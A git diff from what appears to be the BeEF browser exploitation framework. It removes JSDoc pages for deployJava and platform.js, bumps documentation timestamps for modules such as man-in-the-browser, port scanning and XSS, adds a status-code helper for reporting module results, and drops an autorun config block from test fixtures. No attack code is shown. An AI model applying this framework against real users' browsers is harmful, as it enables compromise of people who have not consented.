-                    'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" ' +
-                    'width="0" height="0">' +
-                    '<' + 'PARAM name="launchjnlp" value="' + jnlp + '"' + '>' +
-                    '<' + 'PARAM name="docbase" value="' + jnlpDocbase + '"' + '>' +
-                    '<' + '/' + 'object' + '>';
-            } else if (browser == 'Netscape Family') {
-
-                launchTag = '<' +
-                    'embed type="application/x-java-applet;jpi-version=' +
-                    this.firefoxJavaVersion + '" ' +
-                    'width="0" height="0" ' +
-                    'launchjnlp="' +  jnlp + '"' +
-                    'docbase="' +  jnlpDocbase + '"' +
-                    ' />';
-            }
-
-            if (document.body == 'undefined' || document.body == null) {
-                document.write(launchTag);
-                // go back to original page, otherwise current page becomes blank
-                document.location = jnlpDocbase;
-            } else {
-                var divTag = document.createElement("div");
-                divTag.id = "div1";
-                divTag.style.position = "relative";
-                divTag.style.left = "-10000px";
-                divTag.style.margin = "0px auto";
-                divTag.className ="dynamicDiv";
-                divTag.innerHTML = launchTag;
-                document.body.appendChild(divTag);
-            }
-        },
-
-        createWebStartLaunchButtonEx: function(jnlp, minimumVersion) {
-
-            if (this.returnPage == null) {
-                // if there is an install, come back and run the jnlp file
-                this.returnPage = jnlp;
-            }
-
-            var url = 'javascript:deployJava.launchWebStartApplication(\'' + jnlp +
-                '\');';
-
-            document.write('<' + 'a href="' + url +
-                '" onMouseOver="window.status=\'\'; ' +
-                'return true;"><' + 'img ' +
-                'src="' + this.launchButtonPNG + '" ' +
-                'border="0" /><' + '/' + 'a' + '>');
-        },
-
-
-        /**
-         * Outputs a launch button for the specified JNLP URL.  When clicked, the
-         * button will ensure that an appropriate JRE is installed and then launch
-         * the JNLP application.  minimumVersion is of the form #[.#[.#[_#]]], and
-         * is the minimum JRE version necessary to run this JNLP application.
-         * minimumVersion is optional, and if it is not specified, '1.4.2'
-         * will be used.
-         * If an appropriate JRE or Web Start installation is detected,
-         * the JNLP application will be launched, otherwise installLatestJRE()
-         * will be called.
-         *
-         * After installLatestJRE() is called, the script will attempt to detect
-         * that the JRE installation has completed and launch the JNLP application,
-         * but there are circumstances (such as when the JRE installation
-         * requires a browser restart) when this cannot be fulfilled.
-         */
-        createWebStartLaunchButton: function(jnlp, minimumVersion) {
-
-            if (this.returnPage == null) {
-                // if there is an install, come back and run the jnlp file
-                this.returnPage = jnlp;
-            }
-
-            var url = 'javascript:' +
-                'if (!deployJava.isWebStartInstalled(&quot;' +
-                minimumVersion + '&quot;)) {' +
-                'if (deployJava.installLatestJRE()) {' +
-                'if (deployJava.launch(&quot;' + jnlp + '&quot;)) {}' +
-                '}' +
-                '} else {' +
-                'if (deployJava.launch(&quot;' + jnlp + '&quot;)) {}' +
-                '}';
-
-            document.write('<' + 'a href="' + url +
-                '" onMouseOver="window.status=\'\'; ' +
-                'return true;"><' + 'img ' +
-                'src="' + this.launchButtonPNG + '" ' +
-                'border="0" /><' + '/' + 'a' + '>');
-        },
-
-
-        /**
-         * Launch a JNLP application, (using the plugin if available)
-         */
-        launch: function(jnlp) {
-            /*
-             * Using the plugin to launch Java Web Start is disabled for the time being
-             */
-            document.location=jnlp;
-            return true;
-        },
-
-
-        /*
-         * returns true if the ActiveX or XPI plugin is installed
-         */
-        isPluginInstalled: function() {
-            var plugin = this.getPlugin();
-            if (plugin && plugin.jvms) {
-                return true;
-            } else {
-                return false;
-            }
-        },
-
-        /*
-         * returns true if the plugin is installed and AutoUpdate is enabled
-         */
-        isAutoUpdateEnabled: function() {
-            if (this.isPluginInstalled()) {
-                return this.getPlugin().isAutoUpdateEnabled();
-            }
-            return false;
-        },
-
-        /*
-         * sets AutoUpdate on if plugin is installed
-         */
-        setAutoUpdateEnabled: function() {
-            if (this.isPluginInstalled()) {
-                return this.getPlugin().setAutoUpdateEnabled();
-            }
-            return false;
-        },
-
-        /*
-         * sets the preferred install type : null, online, kernel
-         */
-        setInstallerType: function(type) {
-            this.installType = type;
-            if (this.isPluginInstalled()) {
-                return this.getPlugin().setInstallerType(type);
-            }
-            return false;
-        },
-
-        /*
-         * sets additional package list - to be used by kernel installer
-         */
-        setAdditionalPackages: function(packageList) {
-            if (this.isPluginInstalled()) {
-                return this.getPlugin().setAdditionalPackages(
-                    packageList);
-            }
-            return false;
-        },
-
-        /*
-         * sets preference to install Early Access versions if available
-         */
-        setEarlyAccess: function(enabled) {
-            this.EAInstallEnabled = enabled;
-        },
-
-        /*
-         * Determines if the next generation plugin (Plugin II) is default
-         */
-        isPlugin2: function() {
-            if (this.isPluginInstalled()) {
-                if (this.versionCheck('1.6.0_10+')) {
-                    try {
-                        return this.getPlugin().isPlugin2();
-                    } catch (err) {
-                        // older plugin w/o isPlugin2() function -
-                    }
-                }
-            }
-            return false;
-        },
-
-        //support native DT plugin?
-        allowPlugin: function() {
-            this.getBrowser();
-
-            // Safari and Opera browsers find the plugin but it
-            // doesn't work, so until we can get it to work - don't use it.
-            var ret = ('Safari' != this.browserName2 &&
-                'Opera' != this.browserName2);
-
-            return ret;
-        },
-
-        getPlugin: function() {
-            this.refresh();
-
-            var ret = null;
-            if (this.allowPlugin()) {
-                ret = document.getElementById('deployJavaPlugin');
-            }
-            return ret;
-        },
-
-        compareVersionToPattern: function(version, patternArray,
-                                          familyMatch, minMatch) {
-            if (version == undefined || patternArray == undefined) {
-                return false;
-            }
-            var regex = "^(\\d+)(?:\\.(\\d+)(?:\\.(\\d+)(?:_(\\d+))?)?)?$";
-            var matchData = version.match(regex);
-
-            if (matchData != null) {
-                var index = 0;
-                var result = new Array();
-
-                for (var i = 1; i < matchData.length; ++i) {
-                    if ((typeof matchData[i] == 'string') && (matchData[i] != ''))
-                    {
-                        result[index] = matchData[i];
-                        index++;
-                    }
-                }
-
-                var l = Math.min(result.length, patternArray.length);
-
-                // result contains what is installed in local machine
-                // patternArray is what is being requested by application
-                if (minMatch) {
-                    // minimum version match, return true if what we have (installed)
-                    // is greater or equal to what is requested.  false otherwise.
-                    for (var i = 0; i < l; ++i) {
-                        if (result[i] < patternArray[i]) {
-                            return false;
-                        } else if (result[i] > patternArray[i]) {
-                            return true;
-                        }
-                    }
-                    return true;
-                } else {
-                    for (var i = 0; i < l; ++i) {
-                        if (result[i] != patternArray[i]) return false;
-                    }
-                    if (familyMatch) {
-                        // family match - return true as long as what we have
-                        // (installed) matches up to the request pattern
-                        return true;
-                    } else {
-                        // exact match
-                        // result and patternArray needs to have exact same content
-                        return (result.length == patternArray.length);
-                    }
-                }
-            } else {
-                return false;
-            }
-        },
-
-        getBrowser: function() {
-
-            if (this.browserName == null) {
-                var browser = navigator.userAgent.toLowerCase();
-
-                log('[getBrowser()] navigator.userAgent.toLowerCase() -> ' + browser);
-
-
-                // order is important here.  Safari userAgent contains mozilla,
-                // and Chrome userAgent contains both mozilla and safari.
-                if ((browser.indexOf('msie') != -1) && (browser.indexOf('opera') == -1)) {
-                    this.browserName = 'MSIE';
-                    this.browserName2 = 'MSIE';
-                } else if (browser.indexOf('iphone') != -1) {
-                    // this included both iPhone and iPad
-                    this.browserName = 'Netscape Family';
-                    this.browserName2 = 'iPhone';
-                } else if ((browser.indexOf('firefox') != -1) && (browser.indexOf('opera') == -1)) {
-                    this.browserName = 'Netscape Family';
-                    this.browserName2 = 'Firefox';
-                } else if (browser.indexOf('chrome') != -1) {
-                    this.browserName = 'Netscape Family';
-                    this.browserName2 = 'Chrome';
-                } else if (browser.indexOf('safari') != -1) {
-                    this.browserName = 'Netscape Family';
-                    this.browserName2 = 'Safari';
-                } else if ((browser.indexOf('mozilla') != -1) && (browser.indexOf('opera') == -1)) {
-                    this.browserName = 'Netscape Family';
-                    this.browserName2 = 'Other';
-                } else if (browser.indexOf('opera') != -1) {
-                    this.browserName = 'Netscape Family';
-                    this.browserName2 = 'Opera';
-                } else {
-                    this.browserName = '?';
-                    this.browserName2 = 'unknown';
-                }
-
-                log('[getBrowser()] Detected browser name:'+ this.browserName +
-                    ', ' + this.browserName2);
-            }
-            return this.browserName;
-        },
-
-
-        testUsingActiveX: function(version) {
-            var objectName = 'JavaWebStart.isInstalled.' + version + '.0';
-
-            // we need the typeof check here for this to run on FF/Chrome
-            // the check needs to be in place here - cannot even pass ActiveXObject
-            // as arg to another function
-            if (typeof ActiveXObject == 'undefined' || !ActiveXObject) {
-                log('[testUsingActiveX()] Browser claims to be IE, but no ActiveXObject object?');
-                return false;
-            }
-
-            try {
-                return (new ActiveXObject(objectName) != null);
-            } catch (exception) {
-                return false;
-            }
-        },
-
-
-        testForMSVM: function() {
-            var clsid = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
-
-            if (typeof oClientCaps != 'undefined') {
-                var v = oClientCaps.getComponentVersion(clsid, "ComponentID");
-                if ((v == '') || (v == '5,0,5000,0')) {
-                    return false;
-                } else {
-                    return true;
-                }
-            } else {
-                return false;
-            }
-        },
-
-
-        testUsingMimeTypes: function(version) {
-            if (!navigator.mimeTypes) {
-                log ('[testUsingMimeTypes()] Browser claims to be Netscape family, but no mimeTypes[] array?');
-                return false;
-            }
-
-            for (var i = 0; i < navigator.mimeTypes.length; ++i) {
-                s = navigator.mimeTypes[i].type;
-                var m = s.match(/^application\/x-java-applet\x3Bversion=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);
-                if (m != null) {
-                    if (this.compareVersions(m[1], version)) {
-                        return true;
-                    }
-                }
-            }
-            return false;
-        },
-
-        testUsingPluginsArray: function(version) {
-            if ((!navigator.plugins) || (!navigator.plugins.length)) {
-                return false;
-            }
-            var platform = navigator.platform.toLowerCase();
-
-            for (var i = 0; i < navigator.plugins.length; ++i) {
-                s = navigator.plugins[i].description;
-                if (s.search(/^Java Switchable Plug-in (Cocoa)/) != -1) {
-                    // Safari on MAC
-                    if (this.compareVersions("1.5.0", version)) {
-                        return true;
-                    }
-                } else if (s.search(/^Java/) != -1) {
-                    if (platform.indexOf('win') != -1) {
-                        // still can't tell - opera, safari on windows
-                        // return true for 1.5.0 and 1.6.0
-                        if (this.compareVersions("1.5.0", version) ||
-                            this.compareVersions("1.6.0", version)) {
-                            return true;
-                        }
-                    }
-                }
-            }
-            // if above dosn't work on Apple or Windows, just allow 1.5.0
-            if (this.compareVersions("1.5.0", version)) {
-                return true;
-            }
-            return false;
-
-
-
-        },
-
-        IEInstall: function() {
-
-            location.href = constructGetJavaURL(
-                ((this.returnPage != null) ?
-                    ('&returnPage=' + this.returnPage) : '') +
-                    ((this.locale != null) ?
-                        ('&locale=' + this.locale) : '') +
-                    ((this.brand != null) ? ('&brand=' + this.brand) : ''));
-
-            // should not actually get here
-            return false;
-        },
-
-        done: function (name, result) {
-        },
-
-        FFInstall: function() {
-
-            location.href = constructGetJavaURL(
-                ((this.returnPage != null) ?
-                    ('&returnPage=' + this.returnPage) : '') +
-                    ((this.locale != null) ?
-                        ('&locale=' + this.locale) : '') +
-                    ((this.brand != null) ? ('&brand=' + this.brand) : '') +
-                    ((this.installType != null) ?
-                        ('&type=' + this.installType) : ''));
-
-            // should not actually get here
-            return false;
-        },
-
-        // return true if 'installed' (considered as a JRE version string) is
-        // greater than or equal to 'required' (again, a JRE version string).
-        compareVersions: function(installed, required) {
-
-            var a = installed.split('.');
-            var b = required.split('.');
-
-            for (var i = 0; i < a.length; ++i) {
-                a[i] = Number(a[i]);
-            }
-            for (var i = 0; i < b.length; ++i) {
-                b[i] = Number(b[i]);
-            }
-            if (a.length == 2) {
-                a[2] = 0;
-            }
-
-            if (a[0] > b[0]) return true;
-            if (a[0] < b[0]) return false;
-
-            if (a[1] > b[1]) return true;
-            if (a[1] < b[1]) return false;
-
-            if (a[2] > b[2]) return true;
-            if (a[2] < b[2]) return false;
-
-            return true;
-        },
-
-        enableAlerts: function() {
-            // reset this so we can show the browser detection
-            this.browserName = null;
-            this.debug = true;
-        },
-
-        poll: function() {
-
-            this.refresh();
-            var postInstallJREList = this.getJREs();
-
-            if ((this.preInstallJREList.length == 0) &&
-                (postInstallJREList.length != 0)) {
-                clearInterval(this.myInterval);
-                if (this.returnPage != null) {
-                    location.href = this.returnPage;
-                };
-            }
-
-            if ((this.preInstallJREList.length != 0) &&
-                (postInstallJREList.length != 0) &&
-                (this.preInstallJREList[0] != postInstallJREList[0])) {
-                clearInterval(this.myInterval);
-                if (this.returnPage != null) {
-                    location.href = this.returnPage;
-                }
-            }
-
-        },
-
-        writePluginTag: function() {
-            var browser = this.getBrowser();
-
-            if (browser == 'MSIE') {
-                document.write('<' +
-                    'object classid="clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" ' +
-                    'id="deployJavaPlugin" width="0" height="0">' +
-                    '<' + '/' + 'object' + '>');
-            } else if (browser == 'Netscape Family' && this.allowPlugin()) {
-                this.writeEmbedTag();
-            }
-        },
-
-        refresh: function() {
-            navigator.plugins.refresh(false);
-
-            var browser = this.getBrowser();
-            if (browser == 'Netscape Family' && this.allowPlugin()) {
-                var plugin = document.getElementById('deployJavaPlugin');
-                // only do this again if no plugin
-                if (plugin == null) {
-                    this.writeEmbedTag();
-                }
-            }
-        },
-
-        writeEmbedTag: function() {
-            var written = false;
-            if (navigator.mimeTypes != null) {
-                for (var i=0; i < navigator.mimeTypes.length; i++) {
-                    if (navigator.mimeTypes[i].type == this.mimeType) {
-                        if (navigator.mimeTypes[i].enabledPlugin) {
-                            document.write('<' +
-                                'embed id="deployJavaPlugin" type="' +
-                                this.mimeType + '" hidden="true" />');
-                            written = true;
-                        }
-                    }
-                }
-                // if we ddn't find new mimeType, look for old mimeType
-                if (!written) for (var i=0; i < navigator.mimeTypes.length; i++) {
-                    if (navigator.mimeTypes[i].type == this.oldMimeType) {
-                        if (navigator.mimeTypes[i].enabledPlugin) {
-                            document.write('<' +
-                                'embed id="deployJavaPlugin" type="' +
-                                this.oldMimeType + '" hidden="true" />');
-                        }
-                    }
-                }
-            }
-        }
-    }; // deployJava object
-
-    rv.writePluginTag();
-    if (rv.locale == null) {
-        var loc = null;
-
-        if (loc == null) try {
-            loc = navigator.userLanguage;
-        } catch (err) { }
-
-        if (loc == null) try {
-            loc = navigator.systemLanguage;
-        } catch (err) { }
-
-        if (loc == null) try {
-            loc = navigator.language;
-        } catch (err) { }
-
-        if (loc != null) {
-            loc.replace("-","_")
-            rv.locale = loc;
-        }
-    }
-
-    return rv;
-}();
-
      -
      -
      - - - - -
      - - - -
      - -
      - Documentation generated by JSDoc 3.6.3 on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time) -
      - - - - - diff --git a/docs/lib_platform.js.html b/docs/lib_platform.js.html index 39d32547f4..39b236b2ff 100644 --- a/docs/lib_platform.js.html +++ b/docs/lib_platform.js.html @@ -1296,13 +1296,13 @@

      Source: lib/platform.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/logger.js.html b/docs/logger.js.html index 974377c233..db3d64bb28 100644 --- a/docs/logger.js.html +++ b/docs/logger.js.html @@ -397,13 +397,13 @@

      Source: logger.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/mitb.js.html b/docs/mitb.js.html index 2da91c138f..2baf3072f2 100644 --- a/docs/mitb.js.html +++ b/docs/mitb.js.html @@ -282,13 +282,13 @@

      Source: mitb.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/net.js.html b/docs/net.js.html index ab8d7b2eb6..044cd5b22a 100644 --- a/docs/net.js.html +++ b/docs/net.js.html @@ -600,13 +600,13 @@

      Source: net.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/net_connection.js.html b/docs/net_connection.js.html index fc0c5281de..493c1e3686 100644 --- a/docs/net_connection.js.html +++ b/docs/net_connection.js.html @@ -86,13 +86,13 @@

      Source: net/connection.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/net_cors.js.html b/docs/net_cors.js.html index a3d7cd72e6..84f842c564 100644 --- a/docs/net_cors.js.html +++ b/docs/net_cors.js.html @@ -119,13 +119,13 @@

      Source: net/cors.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/net_dns.js.html b/docs/net_dns.js.html index aab60a15c1..672339fa48 100644 --- a/docs/net_dns.js.html +++ b/docs/net_dns.js.html @@ -133,13 +133,13 @@

      Source: net/dns.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/net_local.js.html b/docs/net_local.js.html index ef0f6bb50e..9033ed211c 100644 --- a/docs/net_local.js.html +++ b/docs/net_local.js.html @@ -123,13 +123,13 @@

      Source: net/local.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/net_portscanner.js.html b/docs/net_portscanner.js.html index 9a95f179b1..c0ca039098 100644 --- a/docs/net_portscanner.js.html +++ b/docs/net_portscanner.js.html @@ -102,13 +102,13 @@

      Source: net/portscanner.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/net_requester.js.html b/docs/net_requester.js.html index 2538459660..9a8f5ecbae 100644 --- a/docs/net_requester.js.html +++ b/docs/net_requester.js.html @@ -77,13 +77,13 @@

      Source: net/requester.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/net_xssrays.js.html b/docs/net_xssrays.js.html index dc61125e06..dfcf12b781 100644 --- a/docs/net_xssrays.js.html +++ b/docs/net_xssrays.js.html @@ -535,13 +535,13 @@

      Source: net/xssrays.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/os.js.html b/docs/os.js.html index 7ab3d2f7e9..dc44eefb3a 100644 --- a/docs/os.js.html +++ b/docs/os.js.html @@ -397,13 +397,13 @@

      Source: os.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/platform.html b/docs/platform.html deleted file mode 100644 index 812a5538db..0000000000 --- a/docs/platform.html +++ /dev/null @@ -1,1147 +0,0 @@ - - - - - JSDoc: Namespace: platform - - - - - - - - - - -
      - -

      Namespace: platform

      - - - - - - -
      - -
      - -

      platform

      - - -
      - -
      -
      - - -

      Platform.js -Copyright 2014-2018 Benjamin Tan -Copyright 2011-2013 John-David Dalton -Available under MIT license

      - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - -
      - - - - - - - - - - - - - - -

      Members

      - - - -

      (static) description :string|null

      - - - - -
      -

      The platform description.

      -
      - - - -
      Type:
      -
        -
      • - -string -| - -null - - -
        • -
      - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - -

      (static) layout :string|null

      - - - - -
      -

      The name of the browser's layout engine.

      -

      The list of common layout engines include: -"Blink", "EdgeHTML", "Gecko", "Trident" and "WebKit"

      -
      - - - -
      Type:
      -
        -
      • - -string -| - -null - - -
        • -
      - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - -

      (static) manufacturer :string|null

      - - - - -
      -

      The name of the product's manufacturer.

      -

      The list of manufacturers include: -"Apple", "Archos", "Amazon", "Asus", "Barnes & Noble", "BlackBerry", -"Google", "HP", "HTC", "LG", "Microsoft", "Motorola", "Nintendo", -"Nokia", "Samsung" and "Sony"

      -
      - - - -
      Type:
      -
        -
      • - -string -| - -null - - -
        • -
      - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - -

      (static) name :string|null

      - - - - -
      -

      The name of the browser/environment.

      -

      The list of common browser names include: -"Chrome", "Electron", "Firefox", "Firefox for iOS", "IE", -"Microsoft Edge", "PhantomJS", "Safari", "SeaMonkey", "Silk", -"Opera Mini" and "Opera"

      -

      Mobile versions of some browsers have "Mobile" appended to their name: -eg. "Chrome Mobile", "Firefox Mobile", "IE Mobile" and "Opera Mobile"

      -
      - - - -
      Type:
      -
        -
      • - -string -| - -null - - -
        • -
      - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - -

      (static) os :Object

      - - - - -
      -

      The name of the operating system.

      -
      - - - -
      Type:
      -
        -
      • - -Object - - -
        • -
      - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - -

      (static) platform :Object

      - - - - -
      -

      The platform object.

      -
      - - - -
      Type:
      -
        -
      • - -Object - - -
        • -
      - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - -

      (static) prerelease :string|null

      - - - - -
      -

      The alpha/beta release indicator.

      -
      - - - -
      Type:
      -
        -
      • - -string -| - -null - - -
        • -
      - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - -

      (static) product :string|null

      - - - - -
      -

      The name of the product hosting the browser.

      -

      The list of common products include:

      -

      "BlackBerry", "Galaxy S4", "Lumia", "iPad", "iPod", "iPhone", "Kindle", -"Kindle Fire", "Nexus", "Nook", "PlayBook", "TouchPad" and "Transformer"

      -
      - - - -
      Type:
      -
        -
      • - -string -| - -null - - -
        • -
      - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - -

      (static) toString

      - - - - -
      -

      Returns platform.description when the platform object is coerced to a string.

      -
      - - - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - -

      (static) ua :string|null

      - - - - -
      -

      The browser's user agent string.

      -
      - - - -
      Type:
      -
        -
      • - -string -| - -null - - -
        • -
      - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - -

      (static) version :string|null

      - - - - -
      -

      The browser/environment version.

      -
      - - - -
      Type:
      -
        -
      • - -string -| - -null - - -
        • -
      - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - - - -

      Methods

      - - - - - - - -

      (static) parse(uaopt) → {Object}

      - - - - - - -
      -

      Creates a new platform object.

      -
      - - - - - - - - - -
      Parameters:
      - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
      NameTypeAttributesDefaultDescription
      ua - - -Object -| - -string - - - - - - <optional>
      - - - - - -       		- - navigator.userAgent - -

      The user agent string or -context object.

      - - - - - - -
      - - - - - - - - - - - - - - - - - - - - - - - - - - -
      Source:
      -
      - - - - - - - -
      - - - - - - - - - - - - - - - -
      Returns:
      - - -
      -

      A platform object.

      -
      - - - -
      -
      - Type -
      -
      - -Object - - -
      -
      - - - - - - - - - - - - - -
      - -
      - - - - -
      - - - -
      - -
      - Documentation generated by JSDoc 3.6.3 on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time) -
      - - - - - \ No newline at end of file diff --git a/docs/session.js.html b/docs/session.js.html index e179b6524d..3662cba242 100644 --- a/docs/session.js.html +++ b/docs/session.js.html @@ -110,13 +110,13 @@

      Source: session.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/status.js.html b/docs/status.js.html new file mode 100644 index 0000000000..ba770c3a81 --- /dev/null +++ b/docs/status.js.html @@ -0,0 +1,93 @@ + + + + + JSDoc: Source: status.js + + + + + + + + + + +
      + +

      Source: status.js

      + + + + + + +
      +
      + 
      //
+// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - https://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/**
+ * Status code helpers for module command results.
+ * Modules use these when sending results back to the BeEF server.
+ * @namespace beef.status
+ */
+
+beef.status = {
+  /**
+   * Success status code
+   * @memberof beef.status
+   * @method success
+   * @return {number} 1
+   */
+  success: function () {
+    return 1;
+  },
+  /**
+   * Unknown status code
+   * @memberof beef.status
+   * @method unknown
+   * @return {number} 0
+   */
+  unknown: function () {
+    return 0;
+  },
+  /**
+   * Error status code
+   * @memberof beef.status
+   * @method error
+   * @return {number} -1
+   */
+  error: function () {
+    return -1;
+  }
+};
+beef.regCmp("beef.status");
+
      +
      +
      + + + + +
      + + + +
      + +
      + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time) +
      + + + + + diff --git a/docs/timeout.js.html b/docs/timeout.js.html index 9b4217ea8d..6c1cd1c779 100644 --- a/docs/timeout.js.html +++ b/docs/timeout.js.html @@ -59,13 +59,13 @@

      Source: timeout.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/updater.js.html b/docs/updater.js.html index 21c9b21ccd..de8f267a25 100644 --- a/docs/updater.js.html +++ b/docs/updater.js.html @@ -129,13 +129,13 @@

      Source: updater.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/webrtc.js.html b/docs/webrtc.js.html index 998f36b033..edb6578324 100644 --- a/docs/webrtc.js.html +++ b/docs/webrtc.js.html @@ -752,13 +752,13 @@

      Source: webrtc.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/websocket.js.html b/docs/websocket.js.html index cc184141dc..148110ab5d 100644 --- a/docs/websocket.js.html +++ b/docs/websocket.js.html @@ -136,13 +136,13 @@

      Source: websocket.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/spec/support/assets/config_new.yaml b/spec/support/assets/config_new.yaml index 8b80cf82f6..2bd90af03c 100644 --- a/spec/support/assets/config_new.yaml +++ b/spec/support/assets/config_new.yaml @@ -106,19 +106,6 @@ beef: database: file: "beef.db" - # Autorun Rule Engine - autorun: - # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval - # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually - # continue execution regardless of results. - # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout. - result_poll_interval: 300 - result_poll_timeout: 5000 - - # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain. - # This is useful to call modules (nested-forward chain mode) that are not returning their status/results. - continue_after_timeout: true - # Enables DNS lookups on zombie IP addresses dns_hostname_lookup: false diff --git a/spec/support/assets/config_old.yaml b/spec/support/assets/config_old.yaml index 3ac3a82252..43c4cbade9 100644 --- a/spec/support/assets/config_old.yaml +++ b/spec/support/assets/config_old.yaml @@ -99,19 +99,6 @@ beef: database: file: "beef.db" - # Autorun Rule Engine - autorun: - # this is used when rule 